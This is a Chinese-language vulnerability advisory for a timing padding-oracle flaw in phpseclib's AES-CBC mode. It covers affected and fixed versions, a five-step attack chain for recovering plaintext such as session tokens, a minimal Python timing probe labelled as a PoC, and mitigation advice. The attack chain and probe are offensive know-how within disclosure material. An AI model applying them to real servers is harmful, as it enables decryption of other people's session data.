CVE-2026-32935 phpseclib AES CBC模式填充预言时序攻击漏洞

漏洞信息

漏洞编号

CVE-2026-32935

漏洞类型

填充预言攻击

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

phpseclib

漏洞概述

phpseclib是一个PHP安全通信库，广泛用于加密操作。在0.1.1至1.0.26、2.0.0至2.0.51以及3.0.0至3.0.49版本中，当使用AES CBC模式时，库在处理填充验证时存在时序侧信道漏洞。攻击者可以通过发送特制的密文并分析服务器响应的时间差异，推断出填充的有效性，进而利用填充预言攻击解密密文。该漏洞可能导致敏感数据泄露，但不会影响数据的完整性和可用性。官方已在1.0.27、2.0.52和3.0.50版本中修复了此问题。

技术细节

该漏洞的核心在于phpseclib在AES CBC模式解密过程中，对PKCS#7填充的校验逻辑存在实现缺陷。在CBC模式下，解密后的数据需要去除填充，如果填充不正确通常会抛出异常。然而，受影响的版本在检查填充大小时，不同类型的错误（如填充字节错误与填充长度错误）导致了不同的处理路径或返回时机，从而产生了可被观测的时间差异。攻击者无需知道密钥，只需向服务器发送修改过IV或密文块的数据包，并精确测量服务器的响应时间。通过统计分析时间差异，攻击者可以判断中间块的解密结果是否符合填充规则，从而逐字节恢复出明文信息。由于该漏洞通过网络利用且无需认证，对使用该库进行数据传输的应用构成了严重威胁。

攻击链分析

STEP 1

信息收集

识别目标应用是否使用phpseclib库，并确认其使用了AES CBC模式进行加密，且版本处于受影响范围内。

STEP 2

获取密文

通过网络抓包或公开接口获取使用该库加密的密文数据（如Session Token、Cookie等）。

STEP 3

构造探测

修改密文的初始化向量（IV）或前一个密文块，发送大量修改后的数据包给解密接口。

STEP 4

时序分析

统计并分析服务器响应每个探测包所需的时间，根据时间差异判断填充是否正确（填充预言）。

STEP 5

解密数据

利用填充预言的结果，逐字节推导出明文内容，获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# Target endpoint that decrypts data using vulnerable phpseclib
TARGET_URL = "https://example.com/api/decrypt"

# Example captured ciphertext (IV + Ciphertext)
# Usually obtained from a cookie or token
SAMPLE_CIPHERTEXT = "aabbccddeeff00112233445566778899..."

def oracle_attack(ciphertext):
    """
    Simulates a timing-based padding oracle attack.
    This function measures the time taken to process a ciphertext.
    A significant time difference may indicate a padding error vs successful decryption.
    """
    headers = {
        "User-Agent": "PoC-Client/1.0",
        "Content-Type": "application/json"
    }
    payload = {"encrypted_data": ciphertext}

    try:
        start_time = time.perf_counter()
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=5)
        end_time = time.perf_counter()
        
        elapsed_time = end_time - start_time
        
        # In a real padding oracle, we care about the response time or status code
        # Here we assume the vulnerable implementation leaks info via timing
        return elapsed_time, response.status_code
    
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None, None

# Basic logic to test timing variations
# In a real exploit, this would involve statistical analysis over many requests
print(f"Testing ciphertext: {SAMPLE_CIPHERTEXT}")
duration, status = oracle_attack(SAMPLE_CIPHERTEXT)
if duration is not None:
    print(f"Response Time: {duration:.6f} seconds, Status: {status}")

影响范围

phpseclib 0.1.1 - 1.0.26

phpseclib 2.0.0 - 2.0.51

phpseclib 3.0.0 - 3.0.49

防御指南

临时缓解措施

若暂时无法升级，建议在应用层面对加密数据进行额外封装，或修改加密算法配置，禁用AES-CBC模式，改用更安全的AEAD（如AES-GCM）模式。同时，可以通过在网络层引入随机延迟来干扰时序分析，但这通常不是完美的解决方案，升级仍是首选。